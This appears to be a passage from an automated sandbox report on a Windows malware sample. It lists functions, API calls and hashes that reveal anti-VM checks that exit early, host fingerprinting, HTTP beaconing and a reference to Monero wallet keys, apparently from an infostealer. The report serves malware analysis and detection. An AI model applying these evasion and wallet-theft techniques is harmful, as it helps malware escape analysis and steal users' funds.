                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen$Sleep
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 507064821-2791005934
                              • Opcode ID: 00d82733ca9f4d54f8266af19b190e8f3618969cb953151e776c6ba56edecc85
                              • Instruction ID: 56683615bd913ca6f5d25927ea4ac119cbf417433328b7df331ab4ecf80498fd
                              • Opcode Fuzzy Hash: 00d82733ca9f4d54f8266af19b190e8f3618969cb953151e776c6ba56edecc85
                              • Instruction Fuzzy Hash: 8BE15072910604AACB16FBA4DDD2AED7778AF64300F508128F4476F091EF746A4DDB92
                              Function 003317A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1301 3317a0-3317cd call 33aad0 StrCmpCA 1304 3317d7-3317f1 call 33aad0 1301->1304 1305 3317cf-3317d1 ExitProcess 1301->1305 1309 3317f4-3317f8 1304->1309 1310 3319c2-3319cd call 33a800 1309->1310 1311 3317fe-331811 1309->1311 1313 331817-33181a 1311->1313 1314 33199e-3319bd 1311->1314 1316 331913-331924 StrCmpCA 1313->1316 1317 331932-331943 StrCmpCA 1313->1317 1318 3318f1-331902 StrCmpCA 1313->1318 1319 331951-331962 StrCmpCA 1313->1319 1320 331970-331981 StrCmpCA 1313->1320 1321 331835-331844 call 33a820 1313->1321 1322 33187f-331890 StrCmpCA 1313->1322 1323 33185d-33186e StrCmpCA 1313->1323 1324 331821-331830 call 33a820 1313->1324 1325 331849-331858 call 33a820 1313->1325 1326 3318cf-3318e0 StrCmpCA 1313->1326 1327 33198f-331999 call 33a820 1313->1327 1328 3318ad-3318be StrCmpCA 1313->1328 1314->1309 1335 331930 1316->1335 1336 331926-331929 1316->1336 1337 331945-331948 1317->1337 1338 33194f 1317->1338 1333 331904-331907 1318->1333 1334 33190e 1318->1334 1339 331964-331967 1319->1339 1340 33196e 1319->1340 1342 331983-331986 1320->1342 1343 33198d 1320->1343 1321->1314 1350 331892-33189c 1322->1350 1351 33189e-3318a1 1322->1351 1348 331870-331873 1323->1348 1349 33187a 1323->1349 1324->1314 1325->1314 1331 3318e2-3318e5 1326->1331 1332 3318ec 1326->1332 1327->1314 1329 3318c0-3318c3 1328->1329 1330 3318ca 1328->1330 1329->1330 1330->1314 1331->1332 1332->1314 1333->1334 1334->1314 1335->1314 1336->1335 1337->1338 1338->1314 1339->1340 1340->1314 1342->1343 1343->1314 1348->1349 1349->1314 1355 3318a8 1350->1355 1351->1355 1355->1314
                              APIs
                              • StrCmpCA.SHLWAPI(00000000,block), ref: 003317C5
                              • ExitProcess.KERNEL32 ref: 003317D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block
                              • API String ID: 621844428-2199623458
                              • Opcode ID: a2e2925da86ec27f32ca538baa6bea95b7157b577eaf2664b686cb81715ce38f
                              • Instruction ID: 47ec6ea34a68651cc518ca1f1766e1dc8414d6d1d673d06e92a3e875ab432188
                              • Opcode Fuzzy Hash: a2e2925da86ec27f32ca538baa6bea95b7157b577eaf2664b686cb81715ce38f
                              • Instruction Fuzzy Hash: 8A5169B4B04209EFCB06DFA4D994FBE77B9BF44704F108048E906AB251D7B0E955DBA2
                              Function 00337500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1356 337500-33754a GetWindowsDirectoryA 1357 337553-3375c7 GetVolumeInformationA call 338d00 * 3 1356->1357 1358 33754c 1356->1358 1365 3375d8-3375df 1357->1365 1358->1357 1366 3375e1-3375fa call 338d00 1365->1366 1367 3375fc-337617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 337619-337626 call 33a740 1367->1369 1370 337628-337658 wsprintfA call 33a740 1367->1370 1377 33767e-33768e 1369->1377 1370->1377
                              APIs
                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00337542
                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0033757F
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00337603
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0033760A
                              • wsprintfA.USER32 ref: 00337640
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                              • String ID: :$C$\$4
                              • API String ID: 1544550907-3012984618
                              • Opcode ID: a68315c525dd1763e0cc1f8a13d7f23be75c6dd2b7642a89e9b722ec84082cbd
                              • Instruction ID: 7b29d2504bb9c150329b5408cbb416f01805d1e659a17b6df58cb3aa3856881b
                              • Opcode Fuzzy Hash: a68315c525dd1763e0cc1f8a13d7f23be75c6dd2b7642a89e9b722ec84082cbd
                              • Instruction Fuzzy Hash: 7A4182F1D04258ABDB11DF98DC95BDEBBB8AF18700F100199F5097B280D7786A44CFA5
                              Function 003369F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                                • Part of subcall function 00339860: GetProcAddress.KERNEL32(74DD0000,010922F0), ref: 003398A1
                                • Part of subcall function 00339860: GetProcAddress.KERNEL32(74DD0000,01092218), ref: 003398BA
                                • Part of subcall function 00339860: GetProcAddress.KERNEL32(74DD0000,01092248), ref: 003398D2
                                • Part of subcall function 00339860: GetProcAddress.KERNEL32(74DD0000,010922A8), ref: 003398EA
                                • Part of subcall function 00339860: GetProcAddress.KERNEL32(74DD0000,01092350), ref: 00339903
                                • Part of subcall function 00339860: GetProcAddress.KERNEL32(74DD0000,01099258), ref: 0033991B
                                • Part of subcall function 00339860: GetProcAddress.KERNEL32(74DD0000,010858D0), ref: 00339933
                                • Part of subcall function 00339860: GetProcAddress.KERNEL32(74DD0000,01085930), ref: 0033994C
                                • Part of subcall function 00339860: GetProcAddress.KERNEL32(74DD0000,01092410), ref: 00339964
                                • Part of subcall function 00339860: GetProcAddress.KERNEL32(74DD0000,010924E8), ref: 0033997C
                                • Part of subcall function 00339860: GetProcAddress.KERNEL32(74DD0000,01092368), ref: 00339995
                                • Part of subcall function 00339860: GetProcAddress.KERNEL32(74DD0000,010924A0), ref: 003399AD
                                • Part of subcall function 00339860: GetProcAddress.KERNEL32(74DD0000,01085970), ref: 003399C5
                                • Part of subcall function 00339860: GetProcAddress.KERNEL32(74DD0000,01092230), ref: 003399DE
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                                • Part of subcall function 003211D0: ExitProcess.KERNEL32 ref: 00321211
                                • Part of subcall function 00321160: GetSystemInfo.KERNEL32(?), ref: 0032116A
                                • Part of subcall function 00321160: ExitProcess.KERNEL32 ref: 0032117E
                                • Part of subcall function 00321110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0032112B
                                • Part of subcall function 00321110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00321132
                                • Part of subcall function 00321110: ExitProcess.KERNEL32 ref: 00321143
                                • Part of subcall function 00321220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0032123E
                                • Part of subcall function 00321220: __aulldiv.LIBCMT ref: 00321258
                                • Part of subcall function 00321220: __aulldiv.LIBCMT ref: 00321266
                                • Part of subcall function 00321220: ExitProcess.KERNEL32 ref: 00321294
                                • Part of subcall function 00336770: GetUserDefaultLangID.KERNEL32 ref: 00336774
                                • Part of subcall function 00321190: ExitProcess.KERNEL32 ref: 003211C6
                                • Part of subcall function 00337850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003211B7), ref: 00337880
                                • Part of subcall function 00337850: RtlAllocateHeap.NTDLL(00000000), ref: 00337887
                                • Part of subcall function 00337850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0033789F
                                • Part of subcall function 003378E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00337910
                                • Part of subcall function 003378E0: RtlAllocateHeap.NTDLL(00000000), ref: 00337917
                                • Part of subcall function 003378E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0033792F
                                • Part of subcall function 0033A9B0: lstrlen.KERNEL32(?,01099048,?,\Monero\wallet.keys,00340E17), ref: 0033A9C5
                                • Part of subcall function 0033A9B0: lstrcpy.KERNEL32(00000000), ref: 0033AA04
                                • Part of subcall function 0033A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0033AA12
                                • Part of subcall function 0033A8A0: lstrcpy.KERNEL32(?,00340E17), ref: 0033A905
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01099268,?,0034110C,?,00000000,?,00341110,?,00000000,00340AEF), ref: 00336ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00336AE8
                              • CloseHandle.KERNEL32(00000000), ref: 00336AF9
                              • Sleep.KERNEL32(00001770), ref: 00336B04
                              • CloseHandle.KERNEL32(?,00000000,?,01099268,?,0034110C,?,00000000,?,00341110,?,00000000,00340AEF), ref: 00336B1A
                              • ExitProcess.KERNEL32 ref: 00336B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                              • String ID:
                              • API String ID: 2525456742-0
                              • Opcode ID: c68063f49443bb7510e1dfab1e822c4b4b3e589ce7919b073a7dbd8dfd926550
                              • Instruction ID: 8d5e70b03560fe5e71e7b41355049fe1a7de6ee04c384dfebacbe2dccb7dd0a7
                              • Opcode Fuzzy Hash: c68063f49443bb7510e1dfab1e822c4b4b3e589ce7919b073a7dbd8dfd926550
                              • Instruction Fuzzy Hash: D0312D71904608AADB06FBF0DC97BEE7778AF14340F104518F242BE191DFB46905DAA2
                              Function 00321220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1436 321220-321247 call 3389b0 GlobalMemoryStatusEx 1439 321273-32127a 1436->1439 1440 321249-321271 call 33da00 * 2 1436->1440 1442 321281-321285 1439->1442 1440->1442 1444 321287 1442->1444 1445 32129a-32129d 1442->1445 1447 321292-321294 ExitProcess 1444->1447 1448 321289-321290 1444->1448 1448->1445 1448->1447
                              APIs
                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0032123E
                              • __aulldiv.LIBCMT ref: 00321258
                              • __aulldiv.LIBCMT ref: 00321266
                              • ExitProcess.KERNEL32 ref: 00321294
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                              • String ID: @
                              • API String ID: 3404098578-2766056989
                              • Opcode ID: a58ff027a5e623ea46e4e723d6a3083e1557ad9f422d21904cd5854bc8a6da3b
                              • Instruction ID: 1b951a2c2b273b76a39b9c69fe74560b48e97a2504424525e71c66574e783697
                              • Opcode Fuzzy Hash: a58ff027a5e623ea46e4e723d6a3083e1557ad9f422d21904cd5854bc8a6da3b
                              • Instruction Fuzzy Hash: 6A016DB0D44308FAEB11DBE4ED49B9EBB78AB24701F208448F705BA2C0D7B455458B99
                              Function 00336AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1450 336af3 1451 336b0a 1450->1451 1453 336aba-336ad7 call 33aad0 OpenEventA 1451->1453 1454 336b0c-336b22 call 336920 call 335b10 CloseHandle ExitProcess 1451->1454 1460 336af5-336b04 CloseHandle Sleep 1453->1460 1461 336ad9-336af1 call 33aad0 CreateEventA 1453->1461 1460->1451 1461->1454
                              APIs
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01099268,?,0034110C,?,00000000,?,00341110,?,00000000,00340AEF), ref: 00336ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00336AE8
                              • CloseHandle.KERNEL32(00000000), ref: 00336AF9
                              • Sleep.KERNEL32(00001770), ref: 00336B04
                              • CloseHandle.KERNEL32(?,00000000,?,01099268,?,0034110C,?,00000000,?,00341110,?,00000000,00340AEF), ref: 00336B1A
                              • ExitProcess.KERNEL32 ref: 00336B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                              • String ID:
                              • API String ID: 941982115-0
                              • Opcode ID: 48f6a15f5c44faa0f56db2d3c47d61d3fdff0e1ec06e3d9d487277aee033c2d0
                              • Instruction ID: 018922725b9f64f4543cc4610aaedefa2458bea335446c103b7ec3bb1dd2e087
                              • Opcode Fuzzy Hash: 48f6a15f5c44faa0f56db2d3c47d61d3fdff0e1ec06e3d9d487277aee033c2d0
                              • Instruction Fuzzy Hash: DCF05870A44209BFE712ABA0DC9BBBEBB38EB14701F108514F503BA1C1DBF05544EEA6
                              Function 003247B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00324839
                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 00324849
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CrackInternetlstrlen
                              • String ID: <
                              • API String ID: 1274457161-4251816714
                              • Opcode ID: aa7dac549657eeb8a6958ccd4f36c9ec5275c189a42647e5144ae6344fade9c9
                              • Instruction ID: af5ec402f90f29046c55dd222459775b07bec6229e4042ef7a61c01e2c88e196
                              • Opcode Fuzzy Hash: aa7dac549657eeb8a6958ccd4f36c9ec5275c189a42647e5144ae6344fade9c9
                              • Instruction Fuzzy Hash: 22214FB1D00208ABDF14DFA4E845ADD7B78FB44320F108625F955AB2C0DB706A05DF92
                              Function 003351F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                                • Part of subcall function 0033A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0033A7E6
                                • Part of subcall function 00326280: InternetOpenA.WININET(00340DFE,00000001,00000000,00000000,00000000), ref: 003262E1
                                • Part of subcall function 00326280: StrCmpCA.SHLWAPI(?,0109E7E8), ref: 00326303
                                • Part of subcall function 00326280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00326335
                                • Part of subcall function 00326280: HttpOpenRequestA.WININET(00000000,GET,?,0109E398,00000000,00000000,00400100,00000000), ref: 00326385
                                • Part of subcall function 00326280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003263BF
                                • Part of subcall function 00326280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003263D1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00335228
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                              • String ID: ERROR$ERROR
                              • API String ID: 3287882509-2579291623
                              • Opcode ID: e88cebc6782aa427a93720d8da0dd60e7e747ecb4ede470524316e8d62687f12
                              • Instruction ID: 18aa17a3be4c5296e4a45404fb5052fd76706389f5c3fb5a16855f83047f07d8
                              • Opcode Fuzzy Hash: e88cebc6782aa427a93720d8da0dd60e7e747ecb4ede470524316e8d62687f12
                              • Instruction Fuzzy Hash: 98117030800908ABCB06FFA4DDD2AED3738AF50300F404558F84A4F592EF34AB05DA91
                              Function 003378E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00337910
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00337917
                              • GetComputerNameA.KERNEL32(?,00000104), ref: 0033792F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
